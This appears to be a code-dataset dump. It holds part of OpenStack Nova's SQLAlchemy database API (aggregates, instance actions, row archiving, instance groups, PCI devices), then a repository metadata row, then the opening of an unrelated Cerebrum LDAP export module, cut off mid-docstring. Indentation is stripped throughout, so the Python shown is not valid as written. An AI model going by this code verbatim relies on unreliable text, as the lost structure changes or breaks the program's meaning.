s3_image_ref.update({'uuid': image_uuid})
s3_image_ref.save()
except Exception as e:
raise db_exc.DBError(e)
return s3_image_ref
####################
def _aggregate_get_query(context, model_class, id_field=None, id=None,
session=None, read_deleted=None):
columns_to_join = {models.Aggregate: ['_hosts', '_metadata']}
query = model_query(context, model_class, session=session,
read_deleted=read_deleted)
for c in columns_to_join.get(model_class, []):
query = query.options(joinedload(c))
if id and id_field:
query = query.filter(id_field == id)
return query
def aggregate_create(context, values, metadata=None):
session = get_session()
query = _aggregate_get_query(context,
models.Aggregate,
models.Aggregate.name,
values['name'],
session=session,
read_deleted='no')
aggregate = query.first()
if not aggregate:
aggregate = models.Aggregate()
aggregate.update(values)
aggregate.save(session=session)
# We don't want these to be lazy loaded later. We know there is
# nothing here since we just created this aggregate.
aggregate._hosts = []
aggregate._metadata = []
else:
raise exception.AggregateNameExists(aggregate_name=values['name'])
if metadata:
aggregate_metadata_add(context, aggregate.id, metadata)
return aggregate_get(context, aggregate.id)
def aggregate_get(context, aggregate_id):
query = _aggregate_get_query(context,
models.Aggregate,
models.Aggregate.id,
aggregate_id)
aggregate = query.first()
if not aggregate:
raise exception.AggregateNotFound(aggregate_id=aggregate_id)
return aggregate
def aggregate_get_by_host(context, host, key=None):
"""Return rows that match host (mandatory) and metadata key (optional).
    :param host: Matches host, and is required.
    :param key: Matches metadata key, if not None.
"""
query = model_query(context, models.Aggregate)
query = query.options(joinedload('_hosts'))
query = query.options(joinedload('_metadata'))
query = query.join('_hosts')
query = query.filter(models.AggregateHost.host == host)
if key:
query = query.join("_metadata").filter(
models.AggregateMetadata.key == key)
return query.all()
def aggregate_metadata_get_by_host(context, host, key=None):
query = model_query(context, models.Aggregate)
query = query.join("_hosts")
query = query.join("_metadata")
query = query.filter(models.AggregateHost.host == host)
query = query.options(contains_eager("_metadata"))
if key:
query = query.filter(models.AggregateMetadata.key == key)
rows = query.all()
metadata = collections.defaultdict(set)
for agg in rows:
for kv in agg._metadata:
metadata[kv['key']].add(kv['value'])
return dict(metadata)
def aggregate_metadata_get_by_metadata_key(context, aggregate_id, key):
query = model_query(context, models.Aggregate)
query = query.join("_metadata")
query = query.filter(models.Aggregate.id == aggregate_id)
query = query.options(contains_eager("_metadata"))
query = query.filter(models.AggregateMetadata.key == key)
rows = query.all()
metadata = collections.defaultdict(set)
for agg in rows:
for kv in agg._metadata:
metadata[kv['key']].add(kv['value'])
return dict(metadata)
def aggregate_host_get_by_metadata_key(context, key):
query = model_query(context, models.Aggregate)
query = query.join("_metadata")
query = query.filter(models.AggregateMetadata.key == key)
query = query.options(contains_eager("_metadata"))
query = query.options(joinedload("_hosts"))
rows = query.all()
metadata = collections.defaultdict(set)
for agg in rows:
for agghost in agg._hosts:
metadata[agghost.host].add(agg._metadata[0]['value'])
return dict(metadata)
def aggregate_update(context, aggregate_id, values):
session = get_session()
if "name" in values:
aggregate_by_name = (_aggregate_get_query(context,
models.Aggregate,
models.Aggregate.name,
values['name'],
session=session,
read_deleted='no').first())
if aggregate_by_name and aggregate_by_name.id != aggregate_id:
# there is another aggregate with the new name
raise exception.AggregateNameExists(aggregate_name=values['name'])
aggregate = (_aggregate_get_query(context,
models.Aggregate,
models.Aggregate.id,
aggregate_id,
session=session).first())
set_delete = True
if aggregate:
if "availability_zone" in values:
az = values.pop('availability_zone')
if 'metadata' not in values:
values['metadata'] = {'availability_zone': az}
set_delete = False
else:
values['metadata']['availability_zone'] = az
metadata = values.get('metadata')
if metadata is not None:
aggregate_metadata_add(context,
aggregate_id,
values.pop('metadata'),
set_delete=set_delete)
aggregate.update(values)
aggregate.save(session=session)
values['metadata'] = metadata
return aggregate_get(context, aggregate.id)
else:
raise exception.AggregateNotFound(aggregate_id=aggregate_id)
def aggregate_delete(context, aggregate_id):
session = get_session()
with session.begin():
count = _aggregate_get_query(context,
models.Aggregate,
models.Aggregate.id,
aggregate_id,
session=session).\
soft_delete()
if count == 0:
raise exception.AggregateNotFound(aggregate_id=aggregate_id)
        # Delete metadata
model_query(context,
models.AggregateMetadata, session=session).\
filter_by(aggregate_id=aggregate_id).\
soft_delete()
def aggregate_get_all(context):
return _aggregate_get_query(context, models.Aggregate).all()
def _aggregate_metadata_get_query(context, aggregate_id, session=None,
read_deleted="yes"):
return model_query(context,
models.AggregateMetadata,
read_deleted=read_deleted,
session=session).\
filter_by(aggregate_id=aggregate_id)
@require_aggregate_exists
def aggregate_metadata_get(context, aggregate_id):
rows = model_query(context,
models.AggregateMetadata).\
filter_by(aggregate_id=aggregate_id).all()
return dict([(r['key'], r['value']) for r in rows])
@require_aggregate_exists
def aggregate_metadata_delete(context, aggregate_id, key):
count = _aggregate_get_query(context,
models.AggregateMetadata,
models.AggregateMetadata.aggregate_id,
aggregate_id).\
filter_by(key=key).\
soft_delete()
if count == 0:
raise exception.AggregateMetadataNotFound(aggregate_id=aggregate_id,
metadata_key=key)
@require_aggregate_exists
def aggregate_metadata_add(context, aggregate_id, metadata, set_delete=False,
max_retries=10):
all_keys = metadata.keys()
for attempt in xrange(max_retries):
try:
session = get_session()
with session.begin():
query = _aggregate_metadata_get_query(context, aggregate_id,
read_deleted='no',
session=session)
if set_delete:
query.filter(~models.AggregateMetadata.key.in_(all_keys)).\
soft_delete(synchronize_session=False)
query = \
query.filter(models.AggregateMetadata.key.in_(all_keys))
already_existing_keys = set()
for meta_ref in query.all():
key = meta_ref.key
meta_ref.update({"value": metadata[key]})
already_existing_keys.add(key)
for key, value in metadata.iteritems():
if key in already_existing_keys:
continue
meta_ref = models.AggregateMetadata()
meta_ref.update({"key": key,
"value": value,
"aggregate_id": aggregate_id})
session.add(meta_ref)
return metadata
except db_exc.DBDuplicateEntry:
# a concurrent transaction has been committed,
# try again unless this was the last attempt
with excutils.save_and_reraise_exception() as ctxt:
if attempt < max_retries - 1:
ctxt.reraise = False
else:
msg = _("Add metadata failed for aggregate %(id)s after "
"%(retries)s retries") % {"id": aggregate_id,
"retries": max_retries}
LOG.warn(msg)
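# Usage sketch (illustrative only; the aggregate id and metadata values are
# made up). The call is an upsert: existing keys are updated, new keys are
# inserted, and with set_delete=True any key not listed is soft-deleted:
#
#     aggregate_metadata_add(ctxt, aggregate_id,
#                            {'availability_zone': 'az1', 'ssd': 'true'},
#                            set_delete=False)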
@require_aggregate_exists
def aggregate_host_get_all(context, aggregate_id):
rows = model_query(context,
models.AggregateHost).\
filter_by(aggregate_id=aggregate_id).all()
return [r.host for r in rows]
@require_aggregate_exists
def aggregate_host_delete(context, aggregate_id, host):
count = _aggregate_get_query(context,
models.AggregateHost,
models.AggregateHost.aggregate_id,
aggregate_id).\
filter_by(host=host).\
soft_delete()
if count == 0:
raise exception.AggregateHostNotFound(aggregate_id=aggregate_id,
host=host)
@require_aggregate_exists
def aggregate_host_add(context, aggregate_id, host):
host_ref = models.AggregateHost()
host_ref.update({"host": host, "aggregate_id": aggregate_id})
try:
host_ref.save()
except db_exc.DBDuplicateEntry:
raise exception.AggregateHostExists(host=host,
aggregate_id=aggregate_id)
return host_ref
################
def instance_fault_create(context, values):
"""Create a new InstanceFault."""
fault_ref = models.InstanceFault()
fault_ref.update(values)
fault_ref.save()
return dict(fault_ref.iteritems())
def instance_fault_get_by_instance_uuids(context, instance_uuids):
"""Get all instance faults for the provided instance_uuids."""
if not instance_uuids:
return {}
rows = model_query(context, models.InstanceFault, read_deleted='no').\
filter(models.InstanceFault.instance_uuid.in_(
instance_uuids)).\
order_by(desc("created_at"), desc("id")).\
all()
output = {}
for instance_uuid in instance_uuids:
output[instance_uuid] = []
for row in rows:
data = dict(row.iteritems())
output[row['instance_uuid']].append(data)
return output
##################
def action_start(context, values):
convert_objects_related_datetimes(values, 'start_time')
action_ref = models.InstanceAction()
action_ref.update(values)
action_ref.save()
return action_ref
def action_finish(context, values):
convert_objects_related_datetimes(values, 'start_time', 'finish_time')
session = get_session()
with session.begin():
action_ref = model_query(context, models.InstanceAction,
session=session).\
filter_by(instance_uuid=values['instance_uuid']).\
filter_by(request_id=values['request_id']).\
first()
if not action_ref:
raise exception.InstanceActionNotFound(
request_id=values['request_id'],
instance_uuid=values['instance_uuid'])
action_ref.update(values)
return action_ref
def actions_get(context, instance_uuid):
"""Get all instance actions for the provided uuid."""
actions = model_query(context, models.InstanceAction).\
filter_by(instance_uuid=instance_uuid).\
order_by(desc("created_at"), desc("id")).\
all()
return actions
def action_get_by_request_id(context, instance_uuid, request_id):
"""Get the action by request_id and given instance."""
action = _action_get_by_request_id(context, instance_uuid, request_id)
return action
def _action_get_by_request_id(context, instance_uuid, request_id,
session=None):
result = model_query(context, models.InstanceAction, session=session).\
filter_by(instance_uuid=instance_uuid).\
filter_by(request_id=request_id).\
first()
return result
def action_event_start(context, values):
"""Start an event on an instance action."""
convert_objects_related_datetimes(values, 'start_time')
session = get_session()
with session.begin():
action = _action_get_by_request_id(context, values['instance_uuid'],
values['request_id'], session)
if not action:
raise exception.InstanceActionNotFound(
request_id=values['request_id'],
instance_uuid=values['instance_uuid'])
values['action_id'] = action['id']
event_ref = models.InstanceActionEvent()
event_ref.update(values)
session.add(event_ref)
return event_ref
def action_event_finish(context, values):
"""Finish an event on an instance action."""
convert_objects_related_datetimes(values, 'start_time', 'finish_time')
session = get_session()
with session.begin():
action = _action_get_by_request_id(context, values['instance_uuid'],
values['request_id'], session)
if not action:
raise exception.InstanceActionNotFound(
request_id=values['request_id'],
instance_uuid=values['instance_uuid'])
event_ref = model_query(context, models.InstanceActionEvent,
session=session).\
filter_by(action_id=action['id']).\
filter_by(event=values['event']).\
first()
if not event_ref:
raise exception.InstanceActionEventNotFound(action_id=action['id'],
event=values['event'])
event_ref.update(values)
if values['result'].lower() == 'error':
action.update({'message': 'Error'})
return event_ref
def action_events_get(context, action_id):
events = model_query(context, models.InstanceActionEvent).\
filter_by(action_id=action_id).\
order_by(desc("created_at"), desc("id")).\
all()
return events
def action_event_get_by_id(context, action_id, event_id):
event = model_query(context, models.InstanceActionEvent).\
filter_by(action_id=action_id).\
filter_by(id=event_id).\
first()
return event
##################
@require_context
def ec2_instance_create(context, instance_uuid, id=None):
"""Create ec2 compatible instance by provided uuid."""
ec2_instance_ref = models.InstanceIdMapping()
ec2_instance_ref.update({'uuid': instance_uuid})
if id is not None:
ec2_instance_ref.update({'id': id})
ec2_instance_ref.save()
return ec2_instance_ref
@require_context
def get_ec2_instance_id_by_uuid(context, instance_id):
result = _ec2_instance_get_query(context).\
filter_by(uuid=instance_id).\
first()
if not result:
raise exception.InstanceNotFound(instance_id=instance_id)
return result['id']
@require_context
def get_instance_uuid_by_ec2_id(context, ec2_id):
result = _ec2_instance_get_query(context).\
filter_by(id=ec2_id).\
first()
if not result:
raise exception.InstanceNotFound(instance_id=ec2_id)
return result['uuid']
def _ec2_instance_get_query(context, session=None):
return model_query(context,
models.InstanceIdMapping,
session=session,
read_deleted='yes')
def _task_log_get_query(context, task_name, period_beginning,
period_ending, host=None, state=None, session=None):
query = model_query(context, models.TaskLog, session=session).\
filter_by(task_name=task_name).\
filter_by(period_beginning=period_beginning).\
filter_by(period_ending=period_ending)
if host is not None:
query = query.filter_by(host=host)
if state is not None:
query = query.filter_by(state=state)
return query
@require_admin_context
def task_log_get(context, task_name, period_beginning, period_ending, host,
state=None):
return _task_log_get_query(context, task_name, period_beginning,
period_ending, host, state).first()
@require_admin_context
def task_log_get_all(context, task_name, period_beginning, period_ending,
host=None, state=None):
return _task_log_get_query(context, task_name, period_beginning,
period_ending, host, state).all()
@require_admin_context
def task_log_begin_task(context, task_name, period_beginning, period_ending,
host, task_items=None, message=None):
task = models.TaskLog()
task.task_name = task_name
task.period_beginning = period_beginning
task.period_ending = period_ending
task.host = host
task.state = "RUNNING"
if message:
task.message = message
if task_items:
task.task_items = task_items
try:
task.save()
except db_exc.DBDuplicateEntry:
raise exception.TaskAlreadyRunning(task_name=task_name, host=host)
@require_admin_context
def task_log_end_task(context, task_name, period_beginning, period_ending,
host, errors, message=None):
values = dict(state="DONE", errors=errors)
if message:
values["message"] = message
session = get_session()
with session.begin():
rows = _task_log_get_query(context, task_name, period_beginning,
period_ending, host, session=session).\
update(values)
if rows == 0:
            # It's not running!
raise exception.TaskNotRunning(task_name=task_name, host=host)
def _get_default_deleted_value(table):
# TODO(dripton): It would be better to introspect the actual default value
# from the column, but I don't see a way to do that in the low-level APIs
# of SQLAlchemy 0.7. 0.8 has better introspection APIs, which we should
# use when Nova is ready to require 0.8.
# NOTE(mikal): this is a little confusing. This method returns the value
# that a _not_deleted_ row would have.
deleted_column_type = table.c.deleted.type
if isinstance(deleted_column_type, Integer):
return 0
elif isinstance(deleted_column_type, Boolean):
return False
elif isinstance(deleted_column_type, String):
return ""
else:
return None
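# Clarifying sketch (illustrative only; the table name is arbitrary). For a
# table whose `deleted` column is an Integer the "live" value is 0, so the
# archive queries below select rows where `deleted != 0`:
#
#     table = Table('instances', metadata, autoload=True)
#     _get_default_deleted_value(table)   # -> 0 for an Integer column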
@require_admin_context
def archive_deleted_rows_for_table(context, tablename, max_rows):
"""Move up to max_rows rows from one tables to the corresponding
shadow table. The context argument is only used for the decorator.
:returns: number of rows archived
"""
# NOTE(guochbo): There is a circular import, nova.db.sqlalchemy.utils
# imports nova.db.sqlalchemy.api.
from nova.db.sqlalchemy import utils as db_utils
engine = get_engine()
conn = engine.connect()
metadata = MetaData()
metadata.bind = engine
table = Table(tablename, metadata, autoload=True)
default_deleted_value = _get_default_deleted_value(table)
shadow_tablename = _SHADOW_TABLE_PREFIX + tablename
rows_archived = 0
try:
shadow_table = Table(shadow_tablename, metadata, autoload=True)
except NoSuchTableError:
# No corresponding shadow table; skip it.
return rows_archived
if tablename == "dns_domains":
# We have one table (dns_domains) where the key is called
# "domain" rather than "id"
column = table.c.domain
column_name = "domain"
else:
column = table.c.id
column_name = "id"
# NOTE(guochbo): Use InsertFromSelect and DeleteFromSelect to avoid
# database's limit of maximum parameter in one SQL statement.
query_insert = select([table],
table.c.deleted != default_deleted_value).\
order_by(column).limit(max_rows)
query_delete = select([column],
table.c.deleted != default_deleted_value).\
order_by(column).limit(max_rows)
insert_statement = db_utils.InsertFromSelect(shadow_table, query_insert)
delete_statement = db_utils.DeleteFromSelect(table, query_delete, column)
try:
# Group the insert and delete in a transaction.
with conn.begin():
result_insert = conn.execute(insert_statement)
result_delete = conn.execute(delete_statement)
except IntegrityError:
# A foreign key constraint keeps us from deleting some of
# these rows until we clean up a dependent table. Just
# skip this table for now; we'll come back to it later.
msg = _("IntegrityError detected when archiving table %s") % tablename
LOG.warn(msg)
return rows_archived
rows_archived = result_delete.rowcount
return rows_archived
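# Usage sketch (illustrative only; table name and row limit are arbitrary).
# Archiving one table moves at most max_rows soft-deleted rows into its
# shadow_* counterpart and returns how many rows were moved:
#
#     moved = archive_deleted_rows_for_table(ctxt, 'instance_metadata',
#                                            max_rows=1000)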
@require_admin_context
def archive_deleted_rows(context, max_rows=None):
"""Move up to max_rows rows from production tables to the corresponding
shadow tables.
:returns: Number of rows archived.
"""
# The context argument is only used for the decorator.
tablenames = []
for model_class in models.__dict__.itervalues():
if hasattr(model_class, "__tablename__"):
tablenames.append(model_class.__tablename__)
rows_archived = 0
for tablename in tablenames:
rows_archived += archive_deleted_rows_for_table(context, tablename,
max_rows=max_rows - rows_archived)
if rows_archived >= max_rows:
break
return rows_archived
####################
def _instance_group_get_query(context, model_class, id_field=None, id=None,
session=None, read_deleted=None):
columns_to_join = {models.InstanceGroup: ['_policies', '_metadata',
'_members']}
query = model_query(context, model_class, session=session,
read_deleted=read_deleted)
for c in columns_to_join.get(model_class, []):
query = query.options(joinedload(c))
if id and id_field:
query = query.filter(id_field == id)
return query
def instance_group_create(context, values, policies=None, metadata=None,
members=None):
"""Create a new group with metadata."""
uuid = values.get('uuid', None)
if uuid is None:
uuid = uuidutils.generate_uuid()
values['uuid'] = uuid
session = get_session()
with session.begin():
try:
group = models.InstanceGroup()
group.update(values)
group.save(session=session)
except db_exc.DBDuplicateEntry:
raise exception.InstanceGroupIdExists(group_uuid=uuid)
# We don't want these to be lazy loaded later. We know there is
# nothing here since we just created this instance group.
group._policies = []
group._metadata = []
group._members = []
if policies:
_instance_group_policies_add(context, group.id, policies,
session=session)
if metadata:
_instance_group_metadata_add(context, group.id, metadata,
session=session)
if members:
_instance_group_members_add(context, group.id, members,
session=session)
return instance_group_get(context, uuid)
def instance_group_get(context, group_uuid):
"""Get a specific group by uuid."""
group = _instance_group_get_query(context,
models.InstanceGroup,
models.InstanceGroup.uuid,
group_uuid).\
first()
if not group:
raise exception.InstanceGroupNotFound(group_uuid=group_uuid)
return group
def instance_group_update(context, group_uuid, values):
"""Update the attributes of an group.
    If values contains a metadata key, it updates the group metadata
too. Similarly for the policies and members.
"""
session = get_session()
with session.begin():
group = model_query(context,
models.InstanceGroup,
session=session).\
filter_by(uuid=group_uuid).\
first()
if not group:
raise exception.InstanceGroupNotFound(group_uuid=group_uuid)
policies = values.get('policies')
if policies is not None:
_instance_group_policies_add(context,
group.id,
values.pop('policies'),
set_delete=True,
session=session)
metadata = values.get('metadata')
if metadata is not None:
_instance_group_metadata_add(context,
group.id,
values.pop('metadata'),
set_delete=True,
session=session)
members = values.get('members')
if members is not None:
_instance_group_members_add(context,
group.id,
values.pop('members'),
set_delete=True,
session=session)
group.update(values)
if policies:
values['policies'] = policies
if metadata:
values['metadata'] = metadata
if members:
values['members'] = members
def instance_group_delete(context, group_uuid):
"""Delete an group."""
session = get_session()
with session.begin():
group_id = _instance_group_id(context, group_uuid, session=session)
count = _instance_group_get_query(context,
models.InstanceGroup,
models.InstanceGroup.uuid,
group_uuid,
session=session).soft_delete()
if count == 0:
raise exception.InstanceGroupNotFound(group_uuid=group_uuid)
# Delete policies, metadata and members
instance_models = [models.InstanceGroupPolicy,
models.InstanceGroupMetadata,
models.InstanceGroupMember]
for model in instance_models:
model_query(context, model, session=session).\
filter_by(group_id=group_id).\
soft_delete()
def instance_group_get_all(context):
"""Get all groups."""
return _instance_group_get_query(context, models.InstanceGroup).all()
def instance_group_get_all_by_project_id(context, project_id):
"""Get all groups."""
return _instance_group_get_query(context, models.InstanceGroup).\
filter_by(project_id=project_id).\
all()
def _instance_group_model_get_query(context, model_class, group_id,
session=None, read_deleted='no'):
return model_query(context,
model_class,
read_deleted=read_deleted,
session=session).\
filter_by(group_id=group_id)
def _instance_group_id(context, group_uuid, session=None):
"""Returns the group database ID for the group UUID."""
result = model_query(context,
models.InstanceGroup.id,
base_model=models.InstanceGroup,
session=session).\
filter_by(uuid=group_uuid).\
first()
if not result:
raise exception.InstanceGroupNotFound(group_uuid=group_uuid)
return result.id
def _instance_group_metadata_add(context, id, metadata, set_delete=False,
session=None):
if not session:
session = get_session()
with session.begin(subtransactions=True):
all_keys = metadata.keys()
query = _instance_group_model_get_query(context,
models.InstanceGroupMetadata,
id,
session=session)
if set_delete:
query.filter(~models.InstanceGroupMetadata.key.in_(all_keys)).\
soft_delete(synchronize_session=False)
query = query.filter(models.InstanceGroupMetadata.key.in_(all_keys))
already_existing_keys = set()
for meta_ref in query.all():
key = meta_ref.key
meta_ref.update({'value': metadata[key]})
already_existing_keys.add(key)
for key, value in metadata.iteritems():
if key in already_existing_keys:
continue
meta_ref = models.InstanceGroupMetadata()
meta_ref.update({'key': key,
'value': value,
'group_id': id})
session.add(meta_ref)
return metadata
def instance_group_metadata_add(context, group_uuid, metadata,
set_delete=False):
id = _instance_group_id(context, group_uuid)
return _instance_group_metadata_add(context, id, metadata,
set_delete=set_delete)
def instance_group_metadata_delete(context, group_uuid, key):
id = _instance_group_id(context, group_uuid)
count = _instance_group_get_query(context,
models.InstanceGroupMetadata,
models.InstanceGroupMetadata.group_id,
id).\
filter_by(key=key).\
soft_delete()
if count == 0:
raise exception.InstanceGroupMetadataNotFound(group_uuid=group_uuid,
metadata_key=key)
def instance_group_metadata_get(context, group_uuid):
id = _instance_group_id(context, group_uuid)
rows = model_query(context,
models.InstanceGroupMetadata.key,
models.InstanceGroupMetadata.value,
base_model=models.InstanceGroupMetadata).\
filter_by(group_id=id).all()
return dict((r[0], r[1]) for r in rows)
def _instance_group_members_add(context, id, members, set_delete=False,
session=None):
if not session:
session = get_session()
all_members = set(members)
with session.begin(subtransactions=True):
query = _instance_group_model_get_query(context,
models.InstanceGroupMember,
id,
session=session)
if set_delete:
query.filter(~models.InstanceGroupMember.instance_id.in_(
all_members)).\
soft_delete(synchronize_session=False)
query = query.filter(
models.InstanceGroupMember.instance_id.in_(all_members))
already_existing = set()
for member_ref in query.all():
already_existing.add(member_ref.instance_id)
for instance_id in members:
if instance_id in already_existing:
continue
member_ref = models.InstanceGroupMember()
member_ref.update({'instance_id': instance_id,
'group_id': id})
session.add(member_ref)
return members
def instance_group_members_add(context, group_uuid, members,
set_delete=False):
id = _instance_group_id(context, group_uuid)
return _instance_group_members_add(context, id, members,
set_delete=set_delete)
def instance_group_member_delete(context, group_uuid, instance_id):
id = _instance_group_id(context, group_uuid)
count = _instance_group_get_query(context,
models.InstanceGroupMember,
models.InstanceGroupMember.group_id,
id).\
filter_by(instance_id=instance_id).\
soft_delete()
if count == 0:
raise exception.InstanceGroupMemberNotFound(group_uuid=group_uuid,
instance_id=instance_id)
def instance_group_members_get(context, group_uuid):
id = _instance_group_id(context, group_uuid)
instances = model_query(context,
models.InstanceGroupMember.instance_id,
base_model=models.InstanceGroupMember).\
filter_by(group_id=id).all()
return [instance[0] for instance in instances]
def _instance_group_policies_add(context, id, policies, set_delete=False,
session=None):
if not session:
session = get_session()
allpols = set(policies)
with session.begin(subtransactions=True):
query = _instance_group_model_get_query(context,
models.InstanceGroupPolicy,
id,
session=session)
if set_delete:
query.filter(~models.InstanceGroupPolicy.policy.in_(allpols)).\
soft_delete(synchronize_session=False)
query = query.filter(models.InstanceGroupPolicy.policy.in_(allpols))
already_existing = set()
for policy_ref in query.all():
already_existing.add(policy_ref.policy)
for policy in policies:
if policy in already_existing:
continue
policy_ref = models.InstanceGroupPolicy()
policy_ref.update({'policy': policy,
'group_id': id})
session.add(policy_ref)
return policies
def instance_group_policies_add(context, group_uuid, policies,
set_delete=False):
id = _instance_group_id(context, group_uuid)
return _instance_group_policies_add(context, id, policies,
set_delete=set_delete)
def instance_group_policy_delete(context, group_uuid, policy):
id = _instance_group_id(context, group_uuid)
count = _instance_group_get_query(context,
models.InstanceGroupPolicy,
models.InstanceGroupPolicy.group_id,
id).\
filter_by(policy=policy).\
soft_delete()
if count == 0:
raise exception.InstanceGroupPolicyNotFound(group_uuid=group_uuid,
policy=policy)
def instance_group_policies_get(context, group_uuid):
id = _instance_group_id(context, group_uuid)
policies = model_query(context,
models.InstanceGroupPolicy.policy,
base_model=models.InstanceGroupPolicy).\
filter_by(group_id=id).all()
return [policy[0] for policy in policies]
####################
@require_admin_context
def pci_device_get_by_addr(context, node_id, dev_addr):
pci_dev_ref = model_query(context, models.PciDevice).\
filter_by(compute_node_id=node_id).\
filter_by(address=dev_addr).\
first()
if not pci_dev_ref:
raise exception.PciDeviceNotFound(node_id=node_id, address=dev_addr)
return pci_dev_ref
@require_admin_context
def pci_device_get_by_id(context, id):
pci_dev_ref = model_query(context, models.PciDevice).\
filter_by(id=id).\
first()
if not pci_dev_ref:
raise exception.PciDeviceNotFoundById(id=id)
return pci_dev_ref
@require_admin_context
def pci_device_get_all_by_node(context, node_id):
return model_query(context, models.PciDevice).\
filter_by(compute_node_id=node_id).\
all()
@require_context
def pci_device_get_all_by_instance_uuid(context, instance_uuid):
return model_query(context, models.PciDevice).\
filter_by(status='allocated').\
filter_by(instance_uuid=instance_uuid).\
all()
def _instance_pcidevs_get_multi(context, instance_uuids, session=None):
return model_query(context, models.PciDevice, session=session).\
filter_by(status='allocated').\
filter(models.PciDevice.instance_uuid.in_(instance_uuids))
@require_admin_context
def pci_device_destroy(context, node_id, address):
result = model_query(context, models.PciDevice).\
filter_by(compute_node_id=node_id).\
filter_by(address=address).\
soft_delete()
if not result:
raise exception.PciDeviceNotFound(node_id=node_id, address=address)
@require_admin_context
def pci_device_update(context, node_id, address, values):
session = get_session()
with session.begin():
device = model_query(context, models.PciDevice, session=session,
read_deleted="no").\
filter_by(compute_node_id=node_id).\
filter_by(address=address).\
first()
if not device:
device = models.PciDevice()
device.update(values)
session.add(device)
return device
|
apache-2.0
| -2,111,573,966,483,229,000
| 35.335143
| 79
| 0.574421
| false
| 4.287253
| false
| false
| false
|
unioslo/cerebrum
|
Cerebrum/modules/no/uio/OrgLDIF.py
|
1
|
15602
|
# -*- coding: utf-8 -*-
# Copyright 2004-2014 University of Oslo, Norway
#
# This file is part of Cerebrum.
#
# Cerebrum is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Cerebrum is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Cerebrum; if not, write to the Free Software Foundation,
# Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
from __future__ import unicode_literals
import re
import pickle
from os.path import join as join_paths
from collections import defaultdict
import cereconf
from Cerebrum.modules.no.OrgLDIF import norEduLDIFMixin
from Cerebrum.modules.OrgLDIF import postal_escape_re
from Cerebrum.modules.LDIFutils import (
ldapconf, normalize_string, hex_escape_match,
normalize_IA5String, verify_IA5String,
)
from Cerebrum.Utils import make_timer
# Replace these characters with spaces in OU RDNs.
ou_rdn2space_re = re.compile('[#\"+,;<>\\\\=\0\\s]+')
class OrgLDIFUiOMixin(norEduLDIFMixin):
"""Mixin class for norEduLDIFMixin(OrgLDIF) with UiO modifications."""
def __init__(self, db, logger):
self.__super.__init__(db, logger)
self.attr2syntax['mobile'] = self.attr2syntax['telephoneNumber']
self.attr2syntax['uioVisiblePrivateMobile'] = \
self.attr2syntax['mobile']
self.attr2syntax['uioPrimaryMail'] = (None, verify_IA5String,
normalize_IA5String),
self.ou_quarantined = {}
def init_ou_dump(self):
self.__super.init_ou_dump()
self.get_ou_quarantines()
ou2parent = dict((c, p)
for p, ous in self.ou_tree.items()
for c in ous)
class Id2ou(dict):
# For missing id2ous, cache and return nearest parent or None
def __missing__(self, key):
val = self[key] = self[ou2parent.get(key)]
return val
self.ou_id2ou_uniq_id = Id2ou(self.ou_id2ou_uniq_id)
self.ou_id2ou_uniq_id.setdefault(None, None)
def test_omit_ou(self):
return (not self.ou.has_spread(self.const.spread_ou_publishable)) or \
self.ou_quarantined.get(self.ou.entity_id, False)
def get_ou_quarantines(self):
for row in self.ou.list_entity_quarantines(
entity_types=self.const.entity_ou,
quarantine_types=self.const.quarantine_ou_notvalid,
only_active=True):
self.ou_quarantined[int(row['entity_id'])] = True
def init_attr2id2contacts(self):
# Change from superclass: Include 'mobile' as well.
contact_source = getattr(self.const,
cereconf.LDAP['contact_source_system'])
contacts = [(attr, self.get_contacts(
contact_type=contact_type,
source_system=source_system,
convert=self.attr2syntax[attr][0],
verify=self.attr2syntax[attr][1],
normalize=self.attr2syntax[attr][2]))
for attr, source_system, contact_type in (
('telephoneNumber', contact_source, self.const.contact_phone),
('mobile', contact_source, self.const.contact_mobile_phone),
('uioVisiblePrivateMobile', contact_source,
self.const.contact_private_mobile_visible),
('facsimileTelephoneNumber', contact_source,
self.const.contact_fax),
('labeledURI', None, self.const.contact_url))]
self.id2labeledURI = contacts[-1][1]
self.attr2id2contacts = [v for v in contacts if v[1]]
def make_address(self, sep,
p_o_box, address_text, postal_number, city, country):
# Changes from superclass:
# Weird algorithm for when to use p_o_box.
# Append "Blindern" to postbox.
if country:
country = self.const.Country(country).country
if (p_o_box and int(postal_number or 0) / 100 == 3):
address_text = "Pb. %s - Blindern" % p_o_box
else:
address_text = (address_text or "").strip()
post_nr_city = None
if city or (postal_number and country):
post_nr_city = " ".join(filter(None, (postal_number,
(city or "").strip())))
val = "\n".join(filter(None, (address_text, post_nr_city, country)))
if sep == '$':
val = postal_escape_re.sub(hex_escape_match, val)
return val.replace("\n", sep)
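    # Illustrative example only (made-up input values): a P.O. box combined
    # with a 03xx postal number is rewritten to the Blindern form, and '$'
    # as separator triggers LDAP postal-address escaping:
    #
    #     self.make_address("$", "1072", "Problemveien 7", "0316",
    #                       "OSLO", None)
    #     # -> "Pb. 1072 - Blindern$0316 OSLO"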
def init_person_course(self):
"""Populate dicts with a person's course information."""
timer = make_timer(self.logger, 'Processing person courses...')
self.ownerid2urnlist = pickle.load(file(
join_paths(ldapconf(None, 'dump_dir'), "ownerid2urnlist.pickle")))
timer("...person courses done.")
def init_person_groups(self):
"""Populate dicts with a person's group information."""
timer = make_timer(self.logger, 'Processing person groups...')
self.person2group = pickle.load(file(
join_paths(ldapconf(None, 'dump_dir'), "personid2group.pickle")))
timer("...person groups done.")
def init_person_dump(self, use_mail_module):
"""Supplement the list of things to run before printing the
list of people."""
self.__super.init_person_dump(use_mail_module)
self.init_person_course()
self.init_person_groups()
def init_person_titles(self):
# Change from original: Search titles first by system_lookup_order,
# then within each system let personal title override work title.
timer = make_timer(self.logger, 'Fetching personal titles...')
titles = defaultdict(dict)
for name_type in (self.const.personal_title, self.const.work_title):
for row in self.person.search_name_with_language(
entity_type=self.const.entity_person,
name_variant=name_type,
name_language=self.languages):
titles[int(row['entity_id'])].setdefault(
int(row['name_language']), row['name'])
self.person_titles = dict([(p_id, t.items())
for p_id, t in titles.items()])
timer("...personal titles done.")
def init_account_mail(self, use_mail_module):
u""" Cache account mail addresses.
        This method extends the general caching to also fill the primary
        email attribute. This is done to prepare for changing the normal
        email attribute.
:param bool use_mail_module:
